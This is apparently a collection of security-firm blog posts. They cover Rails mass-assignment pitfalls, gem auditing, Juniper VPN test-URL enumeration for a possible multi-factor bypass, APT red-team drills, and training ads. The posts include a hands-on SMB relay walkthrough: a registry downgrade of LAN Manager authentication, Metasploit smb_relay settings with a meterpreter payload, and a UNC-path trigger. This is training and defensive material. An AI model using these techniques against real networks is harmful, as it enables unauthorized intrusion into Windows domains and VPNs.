The issue with strong_parameters is where the protection is enforced. Only ActionController::Parameters objects are protected, so user parameters that come through a controller have this protection enforced. The security concern is that when user data does not go through a controller before reaching a model, mass-assignment is still possible: any user parameters introduced to a model from outside a controller can be used to mass-assign.
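For instance, a sketch of the bypass (a hypothetical API-style action): parsing JSON yourself yields a plain Hash, not ActionController::Parameters, so .permit never enters the picture.

```ruby
def create
  attrs = JSON.parse(request.body.read)  # plain Hash -- no strong_parameters
  @user = User.new(attrs)                # mass-assignable again
  @user.save
end
```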

In the example above, a controller action is accepting user params in JSON format, parsing them, and then using them in a call to User.new. This could be a controller action used as an API endpoint that accepts parameters in JSON format. The issue is that when we parse the parameters ourselves, we lose the protection of strong_parameters: we no longer need to call .permit on them before using them in a model, and are now vulnerable to mass-assignment. Another example that could lead to mass-assignment is a file upload feature; a user-provided CSV file could mass-assign attributes if the values aren't handled carefully.

Possible Protections

The most obvious choice for protecting your application from mass-assignment when using strong_parameters is to wrap all user data in ActionController::Parameters before use in any models. While this is very easy to do, it makes the developer responsible for remembering to do it on every use of parameters; this could easily be forgotten in the heat of a quick patch. Another option for protecting against mass-assignment outside of controllers is strict parsing of incoming data, for instance calling .slice on a hash and selecting only the data you need. This again puts the onus on the developer to handle user data carefully.
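The .slice approach can be shown in plain Ruby (Hash#slice is built in as of Ruby 2.5; older Rails apps get an equivalent from ActiveSupport):

```ruby
require "json"

raw  = JSON.parse('{"name":"mal","admin":true}')
safe = raw.slice("name")   # only whitelisted keys survive

safe  # {"name"=>"mal"} -- the "admin" key never reaches the model
```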

Rails 4 and strong_parameters help developers create more tightly defined authorization rules for interacting with models but at the cost of some security. We can no longer rely on ActiveRecord to defend us against mass-assignment and must be very aware of what data is passed to models. While this is a step forward for usability, it seems like a step backwards for security.

If you've ever tested any clients that have Juniper VPNs, you've probably seen the ol':

http://[target]/dana-na/auth/url_default/welcome.cgi URL.

@infosecmafia and I mentioned in our DerbyCon talk how you can sometimes find extra or test URLs that are also valid URLs for the Juniper VPN. The example we used was one where url_default required secret questions but url_8 (or whatever) did not, because it was a test URL the admins had set up.

Soooooooo, it's worth running a quick check if you come across one. I wrote a Metasploit auxiliary module to do this. Pretty simple: it just runs through url_0 to url_100 and prints out the 200 replies. Looks like so:

[+] 192.168.1.1:443 Received a HTTP 200 with bytes for /dana-na/auth/url_0/welcome.cgi
[+] 192.168.1.1:443 Received a HTTP 200 with bytes for /dana-na/auth/url_1/welcome.cgi
[+] 192.168.1.1:443 Received a HTTP 200 with bytes for /dana-na/auth/url_2/welcome.cgi
[+] 192.168.1.1:443 Received a HTTP 200 with bytes for /dana-na/auth/url_3/welcome.cgi
[+] 192.168.1.1:443 Received a HTTP 200 with bytes for /dana-na/auth/url_4/welcome.cgi
[+] 192.168.1.1:443 Received a HTTP 200 with bytes for /dana-na/auth/url_5/welcome.cgi
[+] 192.168.1.1:443 Received a HTTP 200 with bytes for /dana-na/auth/url_6/welcome.cgi
[+] 192.168.1.1:443 Received a HTTP 200 with bytes for /dana-na/auth/url_8/welcome.cgi
[+] 192.168.1.1:443 Received a HTTP 200 with bytes for /dana-na/auth/url_9/welcome.cgi
[+] 192.168.1.1:443 Received a HTTP 200 with bytes for /dana-na/auth/url_12/welcome.cgi

Seeing these doesn't ALWAYS mean you have a multi-factor bypass, but it's worth checking out if the main site is multi-factor.

Random example: url_default, url_3, url_8, url_10

Available on my github repo until I get around to doing a pull request.

Thanks to the efforts of Justin Collins (@presidentbeef - Brakeman) and Hal Brodigan (@postmodern_mod3 - Bundler-Audit), Rails developers (and Sinatra) can use these two tools in tandem with Guard to protect their applications while under development. For those who aren't familiar, Guard was designed to run while you are developing, when you save a file it triggers Guard to run whatever tests you've specified in your Guardfile.

Ruby applications that utilize a Gemfile/Gemfile.lock (files that contain the list of ruby gems an application uses, along with their respective version numbers) can now be audited to determine if those libraries are vulnerable.

Credit to postmodern for developing the auditing gem, and also to RubySec for creating the ruby-advisory-db, a community-maintained database of Ruby gem vulnerabilities that bundler-audit is built on top of. To install it:

gem install bundler-audit

To run it, navigate to the directory where the Gemfile.lock is stored:

bundle-audit check

If the application is using a vulnerable version of a gem, the output will look like...

This post is a very short and very simple tip for easily opening a ruby gem up for closer inspection.

When reviewing a Rails or Sinatra application (code review), it sometimes becomes necessary to view the libraries (ruby gems) that an application is including and using. Instead of navigating to the ~/.rvm/gems/<version>@<gemset name> directory (or wherever else the gems are stored) and opening them with your text editor of choice, you can instead leverage the power of bundler.

For your *nix-based systems that leverage a bashrc, bash_profile, etc.:
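Presumably something like the following; the editor choice is an assumption, and `bundle open <gem>` is what actually drops you into the gem's source:

```shell
# in ~/.bashrc or ~/.bash_profile
export BUNDLER_EDITOR=vim

# then, from the application's directory:
bundle open rack    # opens the rack gem's source in $BUNDLER_EDITOR
```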

We've been having a good time doing intensive, month long or longer APT simulation tests for people, acting like malicious insiders, using hardware implants, 0days, human enabled malware, etc. Lately, however, we've been playing around with a new type of testing to take things to the next level. This testing has two basic components:

Reverse Engineer Testing

Network Forensics Testing

The basic idea is to exercise your RE and packet ninjas even harder to make them strong.

On the RE side we create progressively more difficult malware for them to analyze. Here is an example of a ramp up path for this kind of test:

Essentially we infect your systems with progressively more difficult to analyze malware (that we develop ourselves and ensure is safe), causing your in-house analysts to stretch, learn new skills, and practice so that when real world malware hits, you are ready to deal with it.

We pen test your reverse engineer.

(Or your sandbox appliance if you have decided to go that route instead).

On the Network Forensic side we ramp up the difficulty of our command and control and data ex-filtration techniques in order to exercise and improve your network security staff's capabilities in the following ways:

Randomized timing & changing beacons

Out of band network communications

Protocol misuse & covert channels

False flag / false signature packets

Complex sequencing & esoteric packet based OP codes

Port knocking type attacks

Encoding & encryption

Exploits against network analysis tools

This allows your network forensic analysts to hone their skills looking for anomalous traffic and finding the tricky ways real bad guys hide from detection. It also shows you how effective (or ineffective) your network security appliances such as IDS/IPS are.

All of the tricks and techniques we use for these tests are taken from real world experience in analyzing some of the trickiest malware and the most complex network evasion schemes during incident response events. In addition we throw in some of our own developed methods to keep the analysts on their toes.

This type of testing is most effective as a component to a larger APT simulation but can be done stand alone as well.

At this point in 2013 you probably know what machines on your network need to be patched. You have automated vulnerability scans in place and you have verified and validated scan reports using an exploitation framework. Maybe you've taken that additional step of doing APT simulations to understand your exposure to malicious insiders and sophisticated targeted threats like nation states. However, unless you are testing that final line of defense, the analysts, forensic specialists and anomaly tools, you are still falling behind.

One of the modules in our new Rapid Reverse Engineering class is artifact extraction. For this section of the class, the students use a python module we created for doing artifact/metadata extraction from samples. One of the more interesting pieces of metadata attackers leave behind is the software the malicious file was created with. In this case I was looking at some PDFs. I then realized that while I extract this information for individual samples, I had never run a test on a large set of known APT malware to see what comes out. So I set out on a quick adventure, and wow, was I surprised by the results.

I ended up with the following pie graph

The sample size was roughly 300+ known APT samples that we have. It wasn't our whole sample set of PDFs, but for starters it was a decent size. The list (top 10) looked like this:

A number of things amazed me about this data. One was the lack of opsec from the attackers' perspective, and the old versions of software they are using. From the offensive perspective, if you are dealing with targets that have the resources to do deep-level forensics and operations, then every little bit of opsec is needed. It only takes a small amount of data to put together a large piece of the puzzle.

From the defensive position, it points out the ability for defense organizations to do some early detection. I doubt that most organizations are actually keeping track of or analyzing what types of clean, business-case PDFs come through the front doors. What do the normal clean PDFs coming through your front doors actually look like? Are your clean business-case PDFs being created by the "Python PDF Library - http://pybrary.net/pyPdf/" software? That is a piece of software that is no longer maintained. If you have a standard set of PDFs that come through your front doors and they aren't using strange libraries such as pyPdf, then it might be time to create a nice little snort signature and alert on it. I wouldn't recommend blocking at that level (unless you are up for it), but alerting on something simple like that can pay extremely large dividends for response/defense teams. Imagine telling your CIO/CISO that you detected and remediated an APT* attack coming through the front door with a simple snort sig.

Some of the honorable mentions that didn't make it into the top 10 are:

Advanced PDF Repair at http://www.pdf-repair.com
Acrobat Web Capture 6.0 (wow, that is old)
¦ d o P D F V e r 6 . 2 B u i l d 2 8 8 ( W i n d o w s X P x 3 2 ) *Yes, that is the way it shows up
alientools PDF Generator 1.52
PDFlib 7.0.3 (C++/Win32)

I am getting to the point that you must look at data sets and see what type of information you can glean from them. This idea might be feasible in your organization and it might not, but you as the defender have the ability to determine that for yourself. At the end of April (25th-26th) we are debuting Rapid Reverse Engineering in New York City with Trail of Bits: http://www.trailofbits.com/training/#rapidre. Rapid Reverse Engineering is a class designed to help students learn how to rapidly assess files in incident response scenarios.

We have finalized our Attack Research training schedule for the year. Below is the confirmed schedule of our trainings for the rest of the year; we can't promise that more opportunities won't pop up:

April 25th-26th
Course: Debuting - Rapid Reverse Engineering
Location: New York City at an Attack Research/Trail of Bits training

May 21st-22nd
Course: Operational Post Exploitation
Location: Attack Research Headquarters
This is going to be a unique class. As mobile devices become more and more prevalent, we will be incorporating this concept into the class. Each student will be getting a Nexus 7 that will be used in the class!

June (exact dates TBD)
Course: Rapid Reverse Engineering and Offensive Techniques
Location: London, UK
We are working out the details now and will update things when we have new information.

July 27th-August 1st
Course: Debuting - 4 day version of Tactical Exploitation - 2 day version of Tactical Exploitation
Location: Blackhat, Las Vegas
We have seen our Tactical Exploitation class fill up quite fast in recent years, so register early!

September 23rd-25th
Course: Offensive Techniques
Location: BruCON 2013

October (exact dates TBD)
Course: Offensive Techniques or Rapid Reverse Engineering
Location: Source Seattle

November 4th-6th
Course: Offensive Techniques AND Rapid Reverse Engineering
Location: Countermeasure

Last year we debuted Offensive Techniques at Countermeasure, and this year we will be adding some new content and delivering that class again. Along with Offensive Techniques, we will be teaching our new Rapid Reverse Engineering class. Countermeasure was a fantastic conference and we look forward to another round of it. For more info on each class visit our training page at www.attackresearch.com, or click on the links to register!

We are hosting two trainings at the Attack Research headquarters over the next few months. The first is our Operational Post Exploitation class, which will run January 29th-30th.

We have also just added an Offensive Techniques training in February. We will be hosting it February 26th-28th. More details can be found on our training website.

We are also looking at doing a round of training in the London area in May of this year. Right now we are trying to gauge interest in this location. If you are interested in taking either Offensive Techniques or Rapid Reverse Engineering in this area, please email training@attackresearch.com.

Also, a small but important detail, please ensure within your Gemfile you change:

gem 'bcrypt-ruby', '~> 3.0.0'

to

gem 'bcrypt-ruby', '~> 3.0.0', :require => 'bcrypt'

Now... back to the series. So, we last left off where a login page was visible when browsing to your site, but it didn't really do anything. Time to rectify that.

Within the Sessions controller, a create method was defined and in it we called the User model's method, "authenticate". We have yet to define this "authenticate" method so let's do that now.

Located at /app/models/user.rb

Also, we are going to add an encrypt method and call it using the "before_save" Rails method. Basically, we are going to instruct the User model to call encrypt_password when the "save" method is called. For example:
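A sketch of where this ends up (the classic bcrypt-ruby pattern; the method names match the surrounding text, but the exact implementation details are an assumption):

```ruby
class User < ActiveRecord::Base
  attr_accessor :password

  before_save :encrypt_password

  def self.authenticate(email, password)
    user = find_by_email(email)
    if user && user.password_hash == BCrypt::Engine.hash_secret(password, user.password_salt)
      user
    end
  end

  def encrypt_password
    if password.present?
      self.password_salt = BCrypt::Engine.generate_salt
      self.password_hash = BCrypt::Engine.hash_secret(password, password_salt)
    end
  end
end
```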

So when you see something like user = User.new and user.save, you know that the encrypt_password method will be called by Rails prior to saving the user data, because of the "before_save" definition on line 4.

Now we have to add a few more things:

These are basically Rails validation functions that get called when attempting to save the state of an object that represents a User. The exception is "attr_accessor", which is a standard Ruby call that creates both a getter and a setter for an attribute.

Okay, now let's see what it looks like.

Alright, so now we have a login page that does something, but we need to create users. For this application's purposes, we are going to allow users to sign up. Let's provide a link for this purpose on the login page, and even further, let's create a navigation bar at the top. We want this navigation bar visible on every page the user visits. The easiest way to do that is to make it systemic and place it within the application.html.erb file under the layouts folder. Unless overridden, all views will inherit the properties specified in this file (the navigation bar, for example).

Located at /app/views/layouts/application.html.erb

Without explaining all of Twitter Bootstrap, one important thing to note is that the class names of the HTML tags (ex: <div class="nav">) are how we associate an HTML element with a Twitter Bootstrap-defined style.

The logic portion, the portion that belongs to Ruby and Rails, is lines 13-18. Effectively we are asking whether the user (current_user) visiting the page is authenticated (exists); if they are, show a link to the logout path. Otherwise, render login and signup path links.

You are probably wondering where link_to and current_user come from. Rails provides built-in methods, and you'll notice in the views that they are typically placed between <%= and %>. So, link_to is a built-in method. However, current_user is defined by us within the application controller and is NOT a built-in method.

Located at /app/controllers/application_controller.rb
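A sketch of that controller (the standard session-helper pattern; the exact details are an assumption):

```ruby
class ApplicationController < ActionController::Base
  protect_from_forgery

  helper_method :current_user

  private

  def current_user
    @current_user ||= User.find(session[:user_id]) if session[:user_id]
  end
end
```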

Notice that on line 8 we define a method called current_user. This pulls a user_id value from the Rails session. In order to make the current_user method accessible outside of just this controller and extend it to the views, we have annotated it as a helper_method on line 4.

The next thing we need to do is actually make the signup page. First, let's modify the attributes that are mass-assignable via attr_accessible in the user model file.

Next, review the users_controller.rb file and add the methods new & create. When new is called, we instantiate a new blank User object (@user). Under the create method, we build a new user leveraging the parameters submitted by the user (email, password, password_confirmation).
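Sketched (a Rails controller fragment; the redirect target and flash message are assumptions):

```ruby
def new
  @user = User.new
end

def create
  @user = User.new(params[:user])
  if @user.save
    redirect_to root_url, :notice => "Signed up!"
  else
    render "new"
  end
end
```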

Explanation of the Intended Flow -

User clicks "signup" and is sent to /signup (GET request).

User is routed to the "new" action within the "user" controller and then the HTML content is rendered from - /app/views/users/new.html.erb.

Upon filling in the form data presented via new.html.erb, the user clicks "submit" and this data is sent off, this time in a POST request, to /users.

The POST request to /users translates to the "create" action within the "user" controller.

Now, obviously we are missing something.....we need a signup page! Let's code that up under new.html.erb.

/app/views/users/new.html.erb
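A minimal version of that form (an ERB sketch; the Bootstrap classes are omitted for brevity):

```erb
<%= form_for @user do |f| %>
  <%= f.label :email %>
  <%= f.text_field :email %>

  <%= f.label :password %>
  <%= f.password_field :password %>

  <%= f.label :password_confirmation %>
  <%= f.password_field :password_confirmation %>

  <%= f.submit "Sign up" %>
<% end %>
```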

The internals of Rails, and how we are able to treat @user as an enumerable object and create label tags and text field tags, might be a little too complicated for this post. That being said, basically, the @user object (defined in the User controller under the new action - ex: @user = User.new) has properties associated with it such as email, password, and password confirmation. When Rails renders the view, it generates the parameter names based off the code in this file. In the end, the parameters will look something like user[email] and user[password_confirmation]. Here is what the actual request looks like in Burp...

Signup form generated by the code within /app/views/users/new.html.erb

Raw request of signup form submission captured.

Okay, so, now we have registered a user. The last piece here is to have a home page to view after successful authentication and also code the logout link logic so that it actually does something.

In order to do this, let's make a quick change in the sessions controller. Under the create method, we change home_path to home_index_path, and we create a destroy method which calls the Rails method "reset_session" and redirects the user back to the root_url. Also, remove the content within the index action under the home controller.

People often try to draw analogies between computer security and the military or warfare. Let's put aside for a moment the fact that I don't know anything about the military and continue on with this analogy.

Ask yourself for a moment: "What does the average person in the military spend their time doing?" The answer, I believe, is training, drilling, and exercising. They don't spend the vast majority of their time in heated battle. In fact, only small spurts of time, I'd imagine, are spent that way.

Does your defence team spend all its time engaged in cyber battle? If not, do they spend most of their time training, exercising, and practising for future incidents? If not, why not?

In my experience most defensive teams are in meetings, playing with tools, creating presentations, maintaining systems or perhaps doing some ad hoc analysis. Occasionally they might be engaged in research.

It is my belief that, much like soldiers, these teams should spend a large majority of their time in training. And the best way to do this training is to have an outside entity play the adversary, much like the Air Force Aggressor Squadrons.

Traditional penetration testing does NOT use enemy tactics, techniques and procedures. Penetration testing in general these days is simply patch management verification. Penetration testing often focuses on known exploits and real attackers do not. Attackers either use 0days, complex configuration/design issues or malware.

What's nice about the computer security realm is that it is much easier to replicate adversary "equipment" than with aircraft. The best methods to acquire this equipment is to conduct incident response engagements and/or to have global sources that provide samples and intrusion information.

These samples can then be reverse engineered, their functionality recreated and used in ongoing drills to keep defensive teams sharp.

I have come to believe that defence teams should be constantly drilling against adversary teams. This is the best way they can get better, find institutional deficiencies, improve and validate procedures, etc. This sort of ongoing training is more expensive than penetration testing for sure, but far outstrips traditional penetration testing in benefits.

- - -

Example Drill:

Day 1:

Adversary team sneaks a person into the client facility and embeds a device that provides a command and control foothold out to the internet.

The C2 is designed to mimic a specific attacker's behaviour, such as a beacon using a non-SSL encryption cipher over port 443 with a specific user-agent.

Day 2:

The adversary team begins lateral attack using a custom tool similar to psexec along with a special LSASS injection tool.

The team then sets up persistence using a non-public (but used by real attackers) registry related method along with an RDP related backdoor.

Day 3:

Next the team indexes all documents and stores them in a semi-hidden location on the hard drive, in CD-sized chunks, using a non-English language version of WinRAR and a password captured from an incident response event. The team searches out, identifies, and compromises systems, users, and data of interest. Each drill may have a different target, such as PCI data, engineering-related intellectual property, or executive communications.

Day 4:

Finally, the team exfiltrates this data and prepares the notification document.

Day 5:

The team notifies the client that the week's drill is complete, likely has a conference call or VTC and answers questions related to the exercise. The notification stage includes data that can be used in signatures and alerts such as PCAPS, indicators of compromise, etc. The team and client then discuss what if anything was detected and what could have been done to improve performance, procedures, etc. Plans to tune and improve defensive system configurations can be developed at this stage as well.

- - -

If your defensive staff is not doing something along these lines at LEAST once a quarter, if not once a month, then your soldiers are untrained and likely to get slaughtered when it's time for the real battle.

Having played both the attacker and defender role for many years, something I have often seen, and even done myself, is make statements and assumptions about the "sophistication" of my adversary. Often when some big hack occurs, blogs, media stories, and quotes from experts will espouse opinions that "the attacker was not very sophisticated" or "it was an extremely sophisticated attack." I believe that often, and I myself have been guilty of this, these assertions are the result of a wrong-headed analysis and a misunderstanding of what sophistication means in the context of computer attacks.

An example will help illustrate the point. I have heard Stuxnet labeled both sophisticated and unsophisticated. One might be tempted to point to the inclusion of four 0days as proving that highly skilled attackers launched the attack. Well, 0days can be bought. Others might say that the way it was caught, and the fact that it could infect more than its presumed target, means the attackers weren't very good. Even the most well-developed attacks get caught eventually. (See the device the Russians implanted in the Great Seal 60 years ago.)

A truly sophisticated attacker will use only what is necessary and cost effective to achieve their goals, and no more. An even better attacker will attempt to convince you they are not very good and waste as much of your time as possible while still achieving the goal.

I would put forth the idea that the determination of sophistication be based on a single question: did the attacker achieve their goals? Let us assume further that these goals consist of:

1.) Gaining unauthorized access to one or more of your systems

If they achieve #1, then they have already proven to be more sophisticated than your first line of defensive/prevention systems, as well as your user awareness and training program. To speak of the attacker as unsophisticated because they used an automated SQL injection tool or a basic phishing email is silly, because you have no idea how good they are based solely on the penetration mechanism, and they are already more sophisticated than your ability to stop them.

2.) Evasion of detection, at least for the period of time required to complete some goals

If they have a shell on one of your systems and nothing detects, alerts, or responds, then the attacker is more sophisticated than your SIM implementation, IDS, and first-line analysts, at least from the standpoint of detection during the initial attack. The fact that they used XOR versus full SSL to protect network communications from detection is irrelevant and gives you no clue as to how good they are.

3.) Access to and/or exfiltration of sensitive data

If the attacker has been able to take the data they are targeting, then they have overcome your internal controls, ACLs, and data protection. It matters not whether they used a zip file or steganography to package the data.

4.) Persistence

If the attacker can persist with unauthorized access on your systems for any period of time, then they have outsmarted your defensive team, your secure configuration management, and basically all of your defenses. It doesn't matter if their method of persistence is a simple userland executable launched from the Run key in the registry or a highly stealthy kernel driver; they won that round.

5.) Effect

If they can cause a real-world effect, such as blowing up your centrifuges, gaining a competitive advantage, or spending your money, then that is the final nail in your coffin. They are more sophisticated than you are, regardless of what type of exploit they used, whether it was a 10-year-old Perl CGI bug or one that uses memory tai chi to elegantly overcome Windows 7 buffer overflow protections.

Let's think about this for a minute. Think of all the money, time, resources, and personnel you have expended on perimeter defense, detection and alerting, and analytical teams. Think of the work involved at the vendors who have developed all of the products and appliances you have purchased: the PhDs at AV vendors designing heuristics, the smart guys and girls developing exploits and signatures at your favorite IDS company, the awesome hax0rs at the pen test company you just hired. The often millions of dollars spent on defense. All of this, and the attacker has subverted it, maybe with a month of work, maybe less, and considerably less funding in most cases. So who is the sophisticated one?

The only place you might have won is in the forensics post-event department, usually the least funded and most resource-starved component of your program. This is usually where the determination is made that the attacker was not very sophisticated, because it was possible to reverse engineer the attack and understand the tools and techniques used. That's great, but just because you can understand that an assassin used a rock to kill a VIP doesn't mean the assassin sucks, if they got away from the highly skilled protection detail, the target is dead, and their identity remains unknown.

So pause for a moment before you label an attacker unsophisticated or a script kiddie. Ask yourself: did they achieve the above-mentioned goals? If so, then they outsmarted you.

V.

Lately we have had a number of posts about our training classes, and I said I would put something technical up on the blog. In one of our classes, we teach students how to think like real bad guys and think beyond exploits. We teach how to examine a situation, how to handle that situation, and then how to capitalize on that situation. Recently on an engagement, I had to figure out how to exploit a domain-based account that could log into all Windows 7 hosts on the network, but there were network ACLs in place that prohibited SMB communications between the hosts. So, I turned to SMB relay to help me out. This vulnerability has plagued Windows networks for years, and with MS08-068 and NTLMv2, MS started to make things difficult. MS08-068 won't allow you to replay the hash back to the initial sender and get a shell, but it doesn't stop you from being able to replay the hash to another host and get a shell – at least, it doesn't stop you as long as the host isn't speaking NTLMv2! By default, Vista and up set the LAN Manager authentication level to send the NTLMv2 response only. This becomes problematic in newer networks, as seen in this screen shot from my first attempt to do SMB relay between two Windows 7 hosts:

In this scenario, we have host 192.168.0.14, which I have compromised and have discovered that the domain account rgideon can probably authenticate into all Windows 7 hosts. We have applied unique Windows-based recon techniques that we teach in our class to determine this. We see that 192.168.0.13 is also a Windows 7 host, and we will look to authenticate into it, but we can't do it from the .14 host. There is a firewall between .13 and .14; so instead, we will attempt to do SMB Relay with host 192.168.0.15 as the bounce host.

So, what can we do in this scenario? We don't teach too much visual hacking in any of our classes, so everything must be done using shells, scripts, or something inconspicuous. In this situation, I did some research into the LAN Manager authentication protocol. I found a nice little registry key that doesn't exist by default in Vista and up, but if we put the registry key in place, then the LAN Manager authentication settings listen to it. This happens on the fly; there are no reboots, logons/logoffs, etc. There is a caveat with this! You have to have administrator privileges on the first host! This scenario is about tactically exploiting networks and doing things the smart way.

Since we have a shell on our first host (192.168.0.14) and we have gotten it by migrating into processes, stealing tokens, etc., we can move a reg file with the following contents up to the first host.

This registry key is targeting the following path: HKLM\SYSTEM\CurrentControlSet\Control\Lsa. If we drop in a new DWORD value of 00000000, this will toggle the LAN Manager authentication level down to the absolute minimum, which will send LM and NTLM responses across the network. Now that we have the LAN Manager authentication level set as low as it will go, we can capitalize on this.
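The post doesn't name the value, but the DWORD under that key which conventionally governs the LAN Manager authentication level is LmCompatibilityLevel; a .reg file along these lines (treat the value name as an assumption if your target differs) would set it to the minimum:

```
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"LmCompatibilityLevel"=dword:00000000
```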

Open a metasploit console (you will need admin privileges) on the host that will be set up as a bounce through host (192.168.0.15). With your msfconsole, use the exploit smb_relay and whatever payload you choose. I have chosen to use a reverse_https meterpreter. The screen shot below is an example of my settings:
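The original screenshot isn't reproduced here, but assuming the stock exploit/windows/smb/smb_relay module, the console session might look roughly like this (SMBHOST is the host the captured authentication gets relayed to; the LHOST/LPORT values are illustrative):

```
msf > use exploit/windows/smb/smb_relay
msf exploit(smb_relay) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(smb_relay) > set SMBHOST 192.168.0.13
msf exploit(smb_relay) > set LHOST 192.168.0.15
msf exploit(smb_relay) > set LPORT 8443
msf exploit(smb_relay) > exploit
```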

Once all your settings are selected, exploit and get ready for the hard part. We need to get this account to attempt authentication to our bounce-through host with LAN Manager authentication. SMB relay in this setting is probably best used by getting the account you are targeting to visit your malicious host (192.168.0.15) through a UNC path (\\mybadhost\share). Getting a user to do this is not something we will go into in this post. We reserve that type of thing for the class, but we have used this tactic, coupled with a few others, to compromise almost a whole Windows domain.

For brevity’s sake, we will just go ahead and simulate this activity by typing the following in the Run dialog box on the first victim host (192.168.0.14): \\192.168.0.15\share\image.jpg.

I am not really hosting anything as a share on my host. I just need the LAN Manager authentication process to attempt authentication to my host (192.168.0.15). This authentication attempt actually happens even by just typing \\192.168.0.15. With just the IP address entered, you will see authentication attempts to your host, but for large-scale attacks, or something along those lines, it is best to have a full UNC path. Once the rgideon account on host 192.168.0.14 starts authentication requests to our relay host 192.168.0.15, things will actually look as though they are being denied by the end host 192.168.0.13:

As you can see, we are receiving LAN Manager authentication requests from 192.168.0.14 and attempting to relay them to 192.168.0.13, but it looks as though they are being denied. This is a false negative. Type in sessions -l in your metasploit console, and you will see that you have a meterpreter session on 192.168.0.13.

This is a simple demonstration of an exploit that we teach in some of our offensive-based classes. Our Offensive Techniques class is based on showing people real-world attacks coupled with unique approaches to compromising both Windows and Unix infrastructures. Offensive Techniques has various sections covering techniques we have seen used in APT attacks, and the class also includes custom techniques built and used by Attack Research. The goal of our training is to get students out of the mindset of traditional pen testing and show them how real offensive attacks happen. We are hoping these types of concepts spread to the whole industry. When this happens, we will be able to make an impact at the business level on how companies, governments, etc., make decisions based upon real security threats and a true security landscape. If you are interested in the training we released yesterday or have questions, please visit our site or email us at training@attackresearch.com.

All too often, we at Attack Research have found that students are not being taught, or are not allowed, to properly perform real-world scenarios. For example, they want to run vulnerability scanners on penetration tests! When we say they are not allowed to perform real-world scenarios, some would say it’s the government or the company that doesn't want the real-world scenario. This might be very true, but those governments and companies received the understanding somewhere that running vulnerability scanners on a penetration test was a good idea, and this understanding came through some form of education. Think of network security back in the late 90's to early 2000's: Real-world attacks really did combine scanning for a vulnerability and then exploiting it. Sasser came along and changed the game, and we then had firewalls, improvements in host configurations, etc. In the early 2000's, we started to see what we currently recognize as training in the industry. This training was based upon the attacks in that time period. Well, the evolution of attack has changed, and so has the defense.

Don't get me wrong; the training industry has also evolved, but not at the rate it did when it first started back in the late 90's and 2000's. Back then, there really wasn't a standard for delivering attack-based training. We have certainly had our fair share of standards since then, but when there is no set standard, it is easier to create a new one than it is to change the current one. Well, it’s time to change that! Classes at Attack Research are designed to help students with real-world problems. We hope to work at a grassroots level and a management level to change the way governments and companies approach network security. This is why our classes are designed to teach technical-level, real-world content, not only from an offensive perspective but a defensive one as well. Students will come out of our classes ready to use the skills they learned. They will learn not only how a certain tool is used but the fundamentals behind it, so that when they have differing results from the tools, they will know how to handle it or, better yet, they will not use the tool and will write their own!

We are proud to announce that Attack Research will be at a number of conferences and locations in 2013. Last week, we announced our partnership with Trail of Bits to offer training in the New York City area in January, April, and June.

Along with our annual training at Black Hat Las Vegas, we have joined with Source Conference to provide training at all their conferences. At Source Boston, we will be offering a 2-day version of our Offensive Techniques training. We will also be at BruCON in September!

Attack Research can transport any of its classes around the world or at your own company. If you are interested in private trainings, please drop us a line at training@attackresearch.com

Starting in 2013, we will hold trainings at Attack Research headquarters in New Mexico, where we will be offering reduced rates for all classes. The majority of our classes will be offered at this location, and they are scheduled to begin January 29-30. We will debut our brand new class, Operational Post Exploitation. You can register for this class here.

Our list of available classes is:

Offensive Techniques – Offensive Techniques offers students the opportunity to learn real offensive cyber-operation techniques. The focus is on recon, target profiling and modeling, and exploitation of trust relationships. The class will teach students non-traditional methods that follow closely what advanced adversaries do, rather than compliance-based penetration testing, and will also teach students how to break into computers without using exploits.

Operational Post-Exploitation – This class explores what to do after a successful penetration into a target, including introducing vulnerabilities rather than back doors for persistence. Operational Post-Exploitation covers such techniques as data acquisition, persistence, stealth, and password management on many different operating systems and using several scenarios.

Rapid Reverse Engineering – Rapid Reverse Engineering is a must these days with APT-style attacks and advanced adversaries. This class combines deep reverse engineering subjects with basic rapid triage techniques to provide students with a broad capability when performing malware analysis. This course will take the student from 0 to 60, focusing on learning the tools and key techniques of the trade for rapidly reverse engineering files. Students will understand how to assess rapidly all types of files.

Attacking Windows — Attacking Windows is Attack Research’s unique approach to actually securing Windows. Students will become proficient in attacking Windows systems, learning the commands that are available to help move around systems and data, and examining and employing logging and detection. It will also cover authentication mechanisms, password storage and cracking, tokens, and the domain model. Once finished with this course, students will have a foundation on how attack models on Windows actually happen and how to secure against them.

Attacking Unix — Attacking Unix is Attack Research’s unique approach to actually securing Unix. Students will become proficient in attacking Unix systems, focusing mostly on Linux, Solaris, and FreeBSD. SSH, Kerberos, kernel modules, file sharing, privilege escalation, home directories, and logging will all be covered in depth. Once finished with this course, students will have a foundation on how attack models on Unix actually happen and how to secure against them.

Web Exploitation — The web is one of the most prevalent vectors of choice when attacking targets because websites reside outside the firewall. Web Exploitation will teach the basics of SQL injection, CGI exploits, content management systems, PHP, ASP, and other back doors, as well as the mechanics of exploiting web servers.

MetaPhishing – MetaPhishing is a class designed to teach the black arts for targeted phishing operations, file format reverse engineering and infection, and non-attributable command and control systems. Once completing this class, students will have a solid foundation for all situations of phishing.

Basic Exploit Development — In order to use the tools, one must have an understanding of the basics of how they work. Basic Exploit Development will cover the step-by-step basics, tools, and methods for utilizing buffer/heap overflows on Windows and Unix.

This full listing is available on our website as well under the services/training section. Along with each class, there is a place to allow for notification of when the class will be offered next, either at Attack Research HQ or at a different location.

I will be releasing some example modules from some of our classes over the next few weeks so you can get a feel for what we are offering. If you have any questions, please don't hesitate to contact us at training@attackresearch.com

Geo/social stalking is fun. Bing Maps has the ability to add various "apps" to the map to enhance your Bing Maps experience. One of the cooler ones is the Twitter Map app, which lets you map geotagged tweets.

Let's start with somewhere fun, like the Pentagon, and see who's tweeting around there.

Once you have your places picked out, you can click on the Map Apps tab.

If you click on the Twitter Map app, it loads recent geotagged tweets.

Earlier this week Trail Of Bits announced our partnership with them, offering trainings in New York City. We are very excited to team up with a great company, but also to start delivering practical training in the NYC area. This is the first installment of our new training program that is designed to provide good hands-on knowledge based training that practitioners can use right away. We debuted our latest class Offensive Techniques at Countermeasure 2012 last week with incredible success. We will be offering Offensive Techniques in January with Trail Of Bits in NYC. In April, we will be releasing our new Rapid Reverse Engineering (RRE) class. RRE is a practitioner based training that is designed to give reverse engineers techniques that can be used instantly. The class is designed to help get answers from files in a very rapid manner that can be used in instances such as incident response. There will be a technical blog post soon with some example content from Offensive Techniques and Rapid Reverse Engineering. We are very happy to announce this partnership with Trail Of Bits. We will be releasing a full catalog of our available classes next week!
